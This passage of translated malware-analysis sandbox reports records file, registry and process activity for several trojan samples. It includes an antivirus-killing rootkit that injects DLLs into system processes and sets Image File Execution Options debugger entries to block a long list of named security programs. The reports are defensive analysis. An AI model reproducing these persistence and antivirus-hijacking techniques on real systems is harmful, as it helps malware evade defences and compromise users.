Name]\locals~1\temp\fileshredderset
sfssetupdual.tmp 的行為分析 :
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
C:\Program Files\SecureFileShredder\unins000.dat
C:\Program Files\SecureFileShredder\is-3NR36.tmp
C:\Program Files\SecureFileShredder\unins000.exe
C:\Program Files\SecureFileShredder\is-3JKNR.tmp
C:\Program Files\SecureFileShredder\FileShredder.exe
C:\Program Files\SecureFileShredder\is-SOE7C.tmp
C:\Program Files\SecureFileShredder\FileMonitor.exe
C:\Program Files\SecureFileShredder\is-11JU9.tmp
C:\Program Files\SecureFileShredder\FileShredder.xml
C:\Program Files\SecureFileShredder\is-QMNV3.tmp
C:\Program Files\SecureFileShredder\securefileshredder.url
C:\Program Files\SecureFileShredder\is-9QPAD.tmp
C:\Program Files\SecureFileShredder\FileShredder.ico
C:\Program Files\SecureFileShredder\is-82A76.tmp
C:\Program Files\SecureFileShredder\ExtSFS.dll
C:\Program Files\SecureFileShredder\is-EKPCD.tmp
C:\Program Files\SecureFileShredder\FShellEx.dll
C:\Program Files\SecureFileShredder\is-0EIGP.tmp
C:\Program Files\SecureFileShredder\SafeOper.dll
C:\Program Files\SecureFileShredder\is-9KQPP.tmp
C:\Program Files\SecureFileShredder\ExpBtn.dll
C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\Launch SecureFileShredder.lnk
C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\SecureFileShredder Home Page.lnk
C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk
C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet Explorer\Quick Launch\SecureFileShredder.lnk
Files written:
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
C:\Program Files\SecureFileShredder\is-3NR36.tmp
C:\Program Files\SecureFileShredder\is-3JKNR.tmp
C:\Program Files\SecureFileShredder\is-SOE7C.tmp
C:\Program Files\SecureFileShredder\is-11JU9.tmp
C:\Program Files\SecureFileShredder\is-QMNV3.tmp
C:\Program Files\SecureFileShredder\is-9QPAD.tmp
C:\Program Files\SecureFileShredder\is-82A76.tmp
C:\Program Files\SecureFileShredder\is-EKPCD.tmp
C:\Program Files\SecureFileShredder\is-0EIGP.tmp
C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\Launch SecureFileShredder.lnk
C:\Documents and Settings\All Users\「開始」功能表\程式集\SecureFileShredder\SecureFileShredder Home Page.lnk
C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk
C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet Explorer\Quick Launch\SecureFileShredder.lnk
C:\Program Files\SecureFileShredder\unins000.dat
Registry data set:
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
  Name: {FEAED91E-FB2D-4842-8593-CB82B1A4222D}
  Value: SecureFileShredder shell extention
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
  Name: {D99C619E-00DE-44bc-8870-D3030D4708B4}
  Value: SecureFileShredder shell extention
// The above 2 changes modify the right-click context menu
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
  Name: SecureFileShredder
  Value: C:\Program Files\SecureFileShredder\FileShredder.exe
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
  Name: FileMonitor
  Value: C:\Program Files\SecureFileShredder\FileMonitor.exe
// The above 2 changes cause the specified programs to run at every system start
Files deleted:
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
Folders deleted:
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp
New processes created:
Path: c:\windows\system32\
  Program: taskkill.exe
  Arguments: /F /IM FileShredder.exe
Path: c:\windows\system32\
  Program: taskkill.exe
  Arguments: /F /IM FileMonitor.exe
Path: c:\windows\system32\
  Program: regsvr32.exe
  Arguments: /s "C:\Program Files\SecureFileShredder\ExtSFS.dll"
Path: c:\windows\system32\
  Program: regsvr32.exe
  Arguments: /s "C:\Program Files\SecureFileShredder\FShellEx.dll"
Path: c:\windows\system32\
  Program: regsvr32.exe
  Arguments: /s "C:\Program Files\SecureFileShredder\SafeOper.dll"
Path: c:\windows\system32\
  Program: regsvr32.exe
  Arguments: /s "C:\Program Files\SecureFileShredder\ExpBtn.dll"
Path: c:\program files\securefileshredder\
  Program: fileshredder.exe
Path: c:\program files\securefileshredder\
  Program: filemonitor.exe
Behaviour analysis of taskkill.exe:
Files written:
\Device\NamedPipe\lsarpc
// Looks up the running applications through the pipe
Behaviour analysis of regsvr32.exe:
Registry keys created:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SFSShellExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\SFSShellExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\SFSShellExtension
Registry data set:
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\
  Name: SFSShellExtension
  Value: {FEAED91E-FB2D-4842-8593-CB82B1A4222D}
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\
  Name: SFSShellExtension
  Value: {FEAED91E-FB2D-4842-8593-CB82B1A4222D}
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\
  Name: SFSShellExtension
  Value: {7915AA00-43C5-432d-800D-6F3FD2590F12}
// The above 3 changes modify the right-click context menu
Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\
  Name: {D99C619E-00DE-44bc-8870-D3030D4708B4}
// The above 1 change modifies the Internet Explorer toolbar
Additional information:
Other behaviour:
1. c:\windows\system32\svchost.exe
Files written: \Device\NamedPipe\lsarpc
// Follow-on action of taskkill.exe
2. c:\windows\system32\wbem\wmiprvse.exe
Files written: \Device\NamedPipe\lsarpc // Follow-on action of taskkill.exe
Analysis result:
Threat type: Trojan-Downloader
Sample file name: Trojan2008.12.24@006
Analysis report for setup.exe
General information:
Analysis date: 2008-12-05
Executable: Yes
File type: EXE
Uploader: integear
Analyser: integear
Sample tree:
setup.exe // parent
└ zuhrn0.cmd // dropped file
Behaviour analysis of setup.exe:
Files created:
setup.exe // parent
zuhrn0.cmd // dropped file
New processes created:
setup.exe // parent
Notes:
Unidentified download activity observed
Analysis result:
Threat type: Trojan-Downloader
Sample file name: Trojan2008.12.24@007
Sample name: w32time.dll
Type: Trojan-KillAV-Rootkit
Sample file name: Trojan2008.12.24@008
Uploader: kitman231
Analyser: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: Yes
Files created:
c:\autorun.inf
%Temp%\242687
%Temp%\345234.txt
%Temp%\345328
c:\system.dll
%System%\appwinproc.dll
%System%\Nskhelper2.sys
%System%\NsPass0.sys
%System%\NsPass1.sys
%System%\NsPass2.sys
%System%\NsPass3.sys
%System%\NsPass4.sys
Process and memory behaviour:
Remote memory allocation: created in -> %System%\svchost.exe
Remote DLL injection: %System%\appwinproc.dll -> %Windir%\explorer.exe
                                               -> %ProgramFiles%\messenger\msmsgs.exe
                                               -> %Windir%\dns\sdnsmain.exe
                                               -> %System%\svchost.exe
                      w32time.dll -> generic host process filename
                                  -> %System%\svchost.exe
Drivers loaded: %System%\nskhelper2.sys
                %System%\nspass0.sys
                %System%\nspass1.sys
                %System%\nspass2.sys
                %System%\nspass3.sys
                %System%\nspass4.sys
Registry keys created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivir.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atrack.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avk.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsynmgr.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxonsol.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIND.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DAVPFW.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbg.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debu.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95_O.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EFINET32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorewclass.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fir.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ice.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMOON.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iom.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JED.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kabackreport.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kasmain.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kav32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPPMain.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRF.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVPreScan.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kwatch.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lamapp.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcafee.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoft.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mon.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moniker.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ms.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N32ACAN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapw32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navrunr.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSCHED.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVW32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivir.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atrack.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avk.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsynmgr.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxonsol.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIND.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CT.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DAVPFW.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbg.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debu.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95_O.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EFINET32.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorewclass.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot95.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fir.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.exe]
  o Debugger = "svchost.exe"
* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.exe]
  o Debugger = "svchost.exe"
